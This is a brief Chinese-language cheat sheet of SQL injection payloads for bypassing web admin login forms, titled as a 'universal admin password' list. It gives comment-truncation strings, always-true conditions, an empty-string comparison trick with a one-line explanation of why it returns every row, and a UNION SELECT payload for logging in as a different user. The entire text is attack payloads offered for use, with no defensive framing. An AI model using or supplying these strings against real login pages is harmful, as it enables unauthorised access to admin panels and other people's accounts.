后台万能密码¶
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
username=' or ''='&password=' or ''='
解析:select * from admin where username=''=''and password=''=''
即(username='')='' 等价于 null=null导致输出所有内容
以不同的用户登陆 ' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--